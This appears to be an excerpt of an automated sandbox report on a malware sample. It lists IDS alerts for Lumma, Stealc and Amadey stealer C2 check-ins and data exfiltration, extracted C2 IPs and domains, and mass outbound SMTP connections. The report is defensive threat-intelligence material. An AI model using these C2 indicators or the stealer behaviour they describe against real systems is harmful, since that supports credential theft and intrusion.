                                                Source: Network trafficSuricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.11:49380 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:53717 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:53747 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:53925 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:53957 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50556 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50641 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50706 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50812 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.11:50822 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50911 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.93.20.28:80 -> 192.168.2.11:50918
                                                Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:51005 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.93.20.28:80 -> 192.168.2.11:50918
                                                Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:51066 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:64532 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:64586 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53736 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53736 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53928 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53928 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:50654 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50532 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50902 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50839 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50783 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:51082 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:51118 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:50776 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50776 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53889 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:53747 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53957 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:50703 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:50804 -> 104.21.48.1:443
                                                C2 URLs / IPs found in malware configuration
                                                Source: Malware configuration extractorIPs: 176.113.115.6
                                                Source: Malware configuration extractorIPs: 185.156.73.73
                                                Source: Malware configuration extractorIPs: 45.91.200.135
                                                Source: Malware configuration extractorURLs: towerbingobongoboom.com
                                                Source: Malware configuration extractorURLs: 62.60.226.86
                                                Creates HTML files with .exe extension (expired dropper behavior)
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: LC0cogV.exe.16.dr
                                                Source: unknownNetwork traffic detected: DNS query count 858
                                                Source: unknownNetwork traffic detected: IP country count 26
                                                Source: global trafficTCP traffic: 192.168.2.11:49783 -> 213.209.150.137:4000
                                                Source: global trafficTCP traffic: 192.168.2.11:49803 -> 52.60.87.163:587
                                                Source: global trafficTCP traffic: 192.168.2.11:49804 -> 81.23.32.164:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57652 -> 18.245.46.53:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57653 -> 213.209.1.145:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57654 -> 3.112.99.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57655 -> 81.88.58.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57656 -> 96.102.18.197:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57657 -> 46.234.112.80:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57658 -> 77.75.78.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57659 -> 31.214.178.39:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57660 -> 103.224.182.219:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57661 -> 65.240.194.25:2525
                                                Source: global trafficTCP traffic: 192.168.2.11:57662 -> 104.18.189.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57664 -> 142.250.153.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57665 -> 104.19.239.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57667 -> 103.59.46.46:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57668 -> 52.17.152.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57670 -> 148.163.129.50:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57673 -> 90.216.128.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57674 -> 104.26.12.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57676 -> 167.99.248.199:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57678 -> 194.153.145.104:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57679 -> 15.204.31.140:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57680 -> 74.125.71.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57682 -> 77.75.79.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57683 -> 162.215.2.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57684 -> 185.136.64.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57686 -> 207.251.194.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57694 -> 62.149.188.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57695 -> 77.74.177.55:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57699 -> 141.94.139.121:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57700 -> 212.27.48.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57706 -> 95.216.46.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57705 -> 92.204.80.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57707 -> 146.75.122.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57708 -> 75.102.22.57:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57710 -> 109.234.162.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57712 -> 52.218.56.92:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57714 -> 17.253.142.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57715 -> 72.240.1.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57717 -> 92.240.253.41:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57721 -> 212.227.15.41:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57722 -> 3.122.230.153:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57723 -> 109.70.130.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57724 -> 208.88.137.117:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57727 -> 3.230.199.117:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57728 -> 2.17.100.208:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57730 -> 95.110.169.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57732 -> 96.99.227.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:57735 -> 174.129.25.170:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59829 -> 34.174.238.249:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59832 -> 13.248.169.48:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59833 -> 212.227.0.72:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59830 -> 199.85.66.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59834 -> 207.244.97.88:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59836 -> 165.22.201.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59841 -> 52.64.198.206:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59848 -> 35.238.57.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59849 -> 13.35.58.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59858 -> 195.35.13.215:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59859 -> 200.69.22.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59860 -> 52.206.191.232:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59862 -> 146.155.96.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59863 -> 194.19.134.85:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59865 -> 90.139.102.196:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59868 -> 187.45.240.110:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59869 -> 151.236.219.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59870 -> 200.234.204.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59871 -> 62.221.208.245:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59875 -> 84.14.11.34:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59876 -> 195.32.69.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59881 -> 27.72.194.14:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59883 -> 216.69.141.86:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59885 -> 19.12.97.37:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59887 -> 93.17.128.123:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59892 -> 34.90.43.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59897 -> 212.174.74.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59901 -> 64.59.128.135:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59902 -> 142.251.9.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59903 -> 162.255.118.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59904 -> 194.152.32.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59906 -> 52.101.41.22:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59907 -> 52.101.164.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59914 -> 163.172.240.111:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59915 -> 178.213.66.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59916 -> 81.89.58.131:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59917 -> 217.194.8.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59919 -> 40.85.218.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59921 -> 91.235.52.77:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59924 -> 67.231.148.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59928 -> 76.223.67.189:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59929 -> 80.228.23.221:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59938 -> 104.19.255.251:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59939 -> 81.169.145.64:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59940 -> 116.202.56.145:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59942 -> 199.59.243.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59947 -> 62.149.128.72:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59948 -> 3.33.147.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59949 -> 47.254.33.193:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59953 -> 105.187.224.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59955 -> 92.204.80.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59956 -> 103.86.78.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59957 -> 40.99.150.34:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59958 -> 139.134.5.153:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59963 -> 77.75.78.173:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59969 -> 217.113.224.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59970 -> 52.101.73.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59971 -> 187.6.211.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59976 -> 65.109.49.216:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59983 -> 146.75.118.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59984 -> 92.204.80.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59989 -> 217.72.192.67:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59994 -> 65.254.248.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:59997 -> 217.76.132.243:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64524 -> 52.86.6.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64525 -> 146.88.239.56:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64535 -> 74.125.200.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64536 -> 80.158.67.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64542 -> 217.160.72.6:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64543 -> 23.227.38.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64544 -> 84.116.6.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64545 -> 3.33.139.32:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64546 -> 213.209.1.147:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64549 -> 5.9.65.79:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64550 -> 167.206.148.154:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64555 -> 196.35.198.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64556 -> 52.101.99.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64557 -> 103.230.107.246:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64562 -> 104.22.64.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64567 -> 217.160.184.242:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64570 -> 79.170.40.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64580 -> 210.59.230.45:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64581 -> 156.241.224.141:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64582 -> 45.154.183.183:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64584 -> 104.17.71.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64587 -> 45.60.72.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64590 -> 37.111.152.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64594 -> 52.175.28.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64607 -> 62.103.146.102:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64608 -> 67.202.217.94:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64612 -> 36.138.168.25:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64616 -> 104.18.2.81:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64621 -> 144.208.64.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64633 -> 164.90.197.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64636 -> 91.222.8.52:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64640 -> 85.93.219.11:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64645 -> 213.209.1.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64650 -> 217.26.49.138:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64660 -> 64.190.63.222:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64665 -> 162.215.212.254:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64666 -> 145.226.46.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64670 -> 35.237.212.184:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64671 -> 181.209.27.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64675 -> 195.8.66.22:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64676 -> 109.234.165.210:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64678 -> 31.204.93.82:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64681 -> 75.2.126.67:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64682 -> 46.229.230.48:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64684 -> 183.110.214.4:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64685 -> 194.30.0.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64686 -> 20.76.201.171:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64689 -> 20.23.151.207:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64690 -> 81.169.145.86:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64692 -> 217.116.0.228:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64697 -> 142.132.166.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64702 -> 212.35.60.35:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64703 -> 156.241.15.30:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64708 -> 35.167.11.172:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64709 -> 185.230.212.166:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64722 -> 219.64.12.157:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64725 -> 52.101.42.18:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64726 -> 87.252.1.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64728 -> 185.97.217.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64730 -> 89.46.106.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64731 -> 80.252.97.80:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64735 -> 95.111.239.188:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64741 -> 193.137.45.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64746 -> 104.21.112.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64748 -> 162.159.205.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64749 -> 46.242.144.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64753 -> 162.255.118.7:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64754 -> 162.22.250.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64758 -> 52.28.153.152:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64760 -> 212.72.229.180:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64763 -> 209.202.254.90:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64772 -> 34.160.13.42:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64774 -> 94.169.2.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64777 -> 204.74.99.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64782 -> 117.50.20.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64794 -> 76.76.21.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64796 -> 80.48.169.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64797 -> 80.91.55.62:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64798 -> 94.20.74.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64800 -> 124.153.64.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64804 -> 87.238.28.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64805 -> 194.181.228.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64809 -> 217.19.248.132:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64815 -> 195.130.132.9:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64820 -> 45.60.85.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64822 -> 88.99.165.61:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64824 -> 81.198.164.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53660 -> 96.102.167.164:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53677 -> 211.29.132.105:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53684 -> 45.60.245.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53691 -> 15.197.225.128:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53692 -> 52.101.10.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53693 -> 77.95.250.195:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53696 -> 103.246.18.6:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53708 -> 208.91.197.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53709 -> 94.143.220.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53710 -> 81.169.145.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53714 -> 52.101.10.14:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53718 -> 52.218.102.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53720 -> 3.125.131.179:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53721 -> 188.114.97.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53722 -> 62.101.76.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53728 -> 168.0.132.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53731 -> 3.33.130.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53738 -> 31.186.18.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53739 -> 193.70.18.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53751 -> 185.53.178.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53759 -> 64.136.53.168:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53766 -> 198.185.159.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53767 -> 80.158.66.24:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53771 -> 104.26.5.148:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53772 -> 149.5.31.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53776 -> 211.100.47.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53778 -> 99.83.253.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53875 -> 52.101.73.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53876 -> 3.130.253.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53888 -> 43.252.166.120:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53909 -> 104.37.34.248:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53911 -> 162.243.151.28:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53918 -> 45.60.33.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53922 -> 103.168.172.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53927 -> 72.163.4.185:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53929 -> 52.101.145.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53930 -> 107.150.100.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53941 -> 195.130.131.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53947 -> 45.40.151.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53956 -> 146.75.123.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53958 -> 76.223.84.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53961 -> 92.205.50.235:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50526 -> 185.138.56.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50527 -> 46.30.213.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50531 -> 52.101.137.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50536 -> 79.141.193.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50547 -> 217.74.65.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50554 -> 149.28.121.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50558 -> 83.166.143.44:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50559 -> 212.77.100.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50560 -> 91.226.98.187:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50565 -> 34.205.242.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50566 -> 46.30.213.169:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50575 -> 211.113.80.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50577 -> 200.58.112.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50578 -> 41.222.53.178:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50580 -> 195.182.6.60:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50581 -> 213.186.33.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50585 -> 188.114.96.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50586 -> 46.105.46.142:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50596 -> 52.98.241.194:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50600 -> 85.13.130.209:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50604 -> 212.11.225.17:587
